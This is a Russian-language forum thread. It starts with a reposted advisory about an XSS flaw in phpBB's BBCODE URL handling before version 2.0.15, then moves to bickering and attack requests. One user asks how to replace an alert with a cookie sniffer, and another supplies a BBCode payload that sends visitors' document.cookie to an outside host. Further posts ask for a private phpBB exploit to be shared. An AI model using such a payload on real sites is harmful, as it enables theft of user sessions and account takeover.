Форумы phpBB < 2.0.15, BBCODE URL в phpBB

http://www.securitylab.ru/55012.html
http://www.securitylab.ru/55013.html

Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
Программа: phpBB версии до 2.0.15

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

URL производителя: www.phpbb.com

Решение: Установите последнюю версию (2.0.15) с сайта производителя.

 

Так-с... любить Секлаба!!
Уже в 2-х местах оставил ссылки...

Попрошу больше не писать подобных постов.. Со мной многие согласятся. Нам не нужно тупые копи_пейст новостей секлаба, усёк?

 

Rebz, я те че каждый день ссылки кидаю ? и оставил то я их по делу!!!
вроде как ты и не модератор(админ, урцтой перец ) что бы права качать.
а запостил я потому что ни кто эту тему не обсуждал еще! имхо phpBB многих интересует.


Rebz не надо быть таким "реальным авторитетом форума, подписывающимся за всех"

p.s. вроде я понятно обьяснил...

 

вроде бы понятно..
но вижу ты новичок и не и знаешь наших "тёплых" отношений к секлабу.
А про авторитет - это уже не твоё дело =)

 

сейчас опять обрушится серия ударов по phpBB =)

 

vo novoe sobitie.davaite sozdaite vidio kak lamanut forum.
pojavilsia novij bag zna4it nobvoe vidio popitajtes sozdat.
ocen bi xotelos posmatret

 

кто тебе это сделать мешает?

 

Нунафига с секлаба то

 

Kez ну так выбора же практически нет... По иностранным народ лазить не любит, а из русских он один из лутших, это не реклама это ведь реальность, согласись.
Нужно делать конкуренцию!

 

чтоб посраться можно создать другой топик =)
давайте думайте как это использовать =))))))))))))))

ЗЫ: секурлаб и так читаем... реально.. ссылки сюда можно не выкладывать

 

Нэ эксплорере ничего не сработало.

 

Люди Alert проходит слегка вот только до меня не как не доходит как вместо alertА подставиь снифер с передачей кукисов Помогите плиз...

 

мда... это как?

зависит от форума.
как пример:

HTML:

[url="site.ru"style="background:url(javascript:document.location=sniffer.ru+document.cookie;"]clik me[/url]

 

phpbb 2.0.15 кстати эксплоитом можно взломать,
я его своим личным эксплоитом ломал

 

О! Напиши пожалуйста эксплоит сюда или в личку, если не жалко.

 

шли-шли... выкладывай здесь, блин!) Аттач ещё пока у всех работает))
И давай ссылку где можно скачать!

 

Странно но ладно.
Проверим реацию.

 

уверены что это не будет очередным трояном или еще чем то))

 

Вот я о том же жду как будут крики там приму меры.

 

=)) эй там antares ну что послали тебе сплойт?